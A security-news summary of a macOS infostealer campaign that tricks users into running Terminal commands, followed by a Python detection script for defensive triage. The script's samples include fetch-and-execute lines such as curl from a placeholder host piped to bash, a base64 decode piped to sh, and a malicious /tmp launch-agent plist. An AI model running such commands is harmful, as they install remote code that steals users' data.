MICROSOFT researchers are observing a multi-faceted infostealer campaign targeting macOS users, branded as ClickFix and distributed via fake macOS utilities and guides on blog sites and content platforms. In this iteration, threat actors instruct users to run Terminal commands that fetch and execute remote content, then load an AppleScript or Bash loader to deploy the malware, which can exfiltrate data such as media, iCloud data, Keychain entries, and cryptocurrency wallets.
The campaign has three execution paths: a loader install campaign, a script install campaign, and a helper install campaign, with data staging directories named using random IDs such as /tmp/shub_<random ID>/ and /tmp/<random ID>. Since February 2026, the loader-based approach has used curl to retrieve a second-stage shell script, while the script install campaign delivers shell-encoded payloads via Terminal and keeps the payloads off disk.
In the helper campaign, first-stage scripts fetch Mach-O executables from attacker infrastructure and install persistence through LaunchDaemons and LaunchAgents, enabling long-term remote control, according to the Microsoft Defender Security Research Team and Microsoft Defender Experts.
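As an added triage illustration (not code from Microsoft's report), the Python below flags the three behaviours described above in process command lines and launch items: a curl-to-shell fetch-and-execute pipeline, a decode-and-execute pipeline, a /tmp staging directory, and a LaunchAgent/LaunchDaemon whose program lives under /tmp. All command lines and plists are constructed samples; example.invalid is a placeholder host.

```python
import re
import plistlib

# Constructed sample process command lines (not from the original report).
SAMPLE_CMDLINES = [
    '/bin/zsh -c "curl -fsSL https://example.invalid/update.sh | bash"',
    '/bin/bash -c "echo aGVsbG8= | base64 -d | sh"',
    "/usr/bin/osascript /tmp/shub_a1b2c3/loader.scpt",
    "/usr/bin/curl -o /tmp/xk9q2/helper https://example.invalid/helper",
    "/bin/ls -la /Users/demo",
]

# curl output piped straight into an interpreter (the ClickFix Terminal pattern)
FETCH_EXEC = re.compile(r"\bcurl\b.*\|\s*(?:bash|sh|zsh|osascript)\b")
# encoded payload decoded in memory and piped into a shell
DECODE_EXEC = re.compile(r"\bbase64\s+(?:-d|--decode|-D)\b.*\|\s*(?:bash|sh|zsh)\b")
# random-ID staging directories like /tmp/shub_<id>/ or /tmp/<id>/
STAGING_DIR = re.compile(r"/tmp/(?:shub_)?[A-Za-z0-9]{4,}/")


def classify(cmdline):
    """Return the list of indicator names found in one command line."""
    hits = []
    if FETCH_EXEC.search(cmdline):
        hits.append("fetch-and-execute")
    if DECODE_EXEC.search(cmdline):
        hits.append("decode-and-execute")
    if STAGING_DIR.search(cmdline):
        hits.append("tmp-staging-dir")
    return hits


def suspicious_launch_item(plist_bytes):
    """True when a LaunchAgent/LaunchDaemon plist runs a program from /tmp."""
    item = plistlib.loads(plist_bytes)
    candidates = list(item.get("ProgramArguments", []))
    if item.get("Program"):
        candidates.insert(0, item["Program"])
    return any(str(c).startswith("/tmp/") for c in candidates)


# Constructed launch item plists: one staged from /tmp, one benign.
SAMPLE_LAUNCH_AGENT = plistlib.dumps(
    {"Label": "com.example.helper", "ProgramArguments": ["/tmp/xk9q2/helper"], "RunAtLoad": True}
)
BENIGN_LAUNCH_AGENT = plistlib.dumps(
    {"Label": "com.example.sync", "ProgramArguments": ["/usr/local/bin/sync", "--daemon"]}
)

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify(line), line)
    print(suspicious_launch_item(SAMPLE_LAUNCH_AGENT), suspicious_launch_item(BENIGN_LAUNCH_AGENT))
```

The /tmp heuristics are deliberately broad and meant for triage of EDR process and launch-item telemetry, not as a standalone verdict.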